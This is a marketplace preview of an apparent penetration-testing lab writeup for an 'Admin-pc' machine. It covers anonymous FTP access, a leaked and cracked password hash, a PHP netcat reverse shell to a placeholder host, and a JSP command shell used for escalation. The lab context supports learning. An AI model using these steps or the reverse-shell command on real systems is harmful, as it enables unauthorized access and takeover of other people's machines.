Software Engineering > DISCUSSION POST > Admin-pc machine (All)

Admin-pc machine

Document Content and Description Below

Admin-pc machine writeup Exploitation Scan the machine using nmap 192.168.x.55 -A One interesting part is the ftp service output Connect to the server and get the xampp config file Use user anon... ymous with any password 21/tcp open ftp syn-ack ttl 128 | fingerprint-strings: | GenericLines: | 220-Wellcome to Home Ftp Server! | Server ready. | command not understood. | command not understood. | Help: | 220-Wellcome to Home Ftp Server! | Server ready. | 'HELP': command not understood. | NULL, SMBProgNeg: | 220-Wellcome to Home Ftp Server! |_ Server ready. | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 . [NSE: writeabl |_drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 .. [NSE: writeab Posts This study source was downloaded by 100000830919685 from CourseHero.com on 05-15-2022 11:45:49 GMT -05:00 https://www.coursehero.com/file/72266054/192168x55-Admin-pc-machine-writeup-Cyb3rsickpdf/← 192.168.x.161 – Ph33r machine writeup (http://web.archive.org/web/2019020509482 6/https://cyb3rsick.com/2019/01/20/192-168- x-161-ph33r-machine-writeup/) 192.168.x.53 – unreal tournament machine writeup → (http://web.archive.org/web/2019020509482 6/https://cyb3rsick.com/2019/01/22/192-168- x-53-unreal-tournament-machine-writeup/) the file contain the credentials fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1 Crack the password, you will get the plaintext fm:x-files Now connect to 192.168.x.55:10433/admin which is file manager allowing executable files upload netcat.exe and then upload php file including system(‘nc –vv YOUR_HOST 443 –e cmd.exe’); to gain shell access Escalation Upload jsp shell file to c:/xampp/tomcat/webapps/examples then browse it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami And you’re an admin [root:~/Desktop]# ftp ftp> o (to) 192.168.x.55 Connected to 192.168.x.55. 220-Wellcome to Home Ftp Server! 220 Server ready. Name (192.168.x.55:root): anonymous 331 Password required for anonymous. Password: 230 User Anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. [Show More]

Last updated: 1 year ago

Preview 1 out of 5 pages

Add to cart

Instant download

Add to cart

Instant download

Report Copyright Violation

Reviews( 0 )

DISCUSSION POST

$7.00

Add to cart

Instant download

Can't find what you want? Try our AI powered Search

OR

REQUEST DOCUMENT
103
0

Document information

Connected school, study & course

About the document

Uploaded On

Jul 24, 2022

Number of pages

5

Written in

Type

DISCUSSION POST

Seller

seller-icon
CourseWorks,Inc

Member since 1 year

8 Documents Sold

Send Message
Additional information

This document has been written for:

Course

Software Engineering

Category

DISCUSSION POST

Uploaded

Jul 24, 2022

Downloads

 0

Views

 103

Document Keyword Tags

More From CourseWorks,Inc

View all CourseWorks,Inc's documents »

Recommended For You

Get more on DISCUSSION POST »
$7.00
Add to cart
What is Browsegrades

In Browsegrades, a student can earn by offering help to other student. Students can help other students with materials by upploading their notes and earn money.

Get to know us
About Us
Privacy Statement
Terms and Conditions
Contact Us
Blog
We are here to help

We're available through e-mail, Twitter, Facebook, and live chat.
 FAQ
 Questions? Leave a message!

Follow us on
 Twitter
Useful links
  • Knowledge Management and Advanced Practice Nursing
  • Fraudster Dictionary Learn the slang and operational techniques of online payment fraudsters.
  • Courses
  • Categories
    • We accept

    payment cards

    Copyright © Browsegrades · High quality services·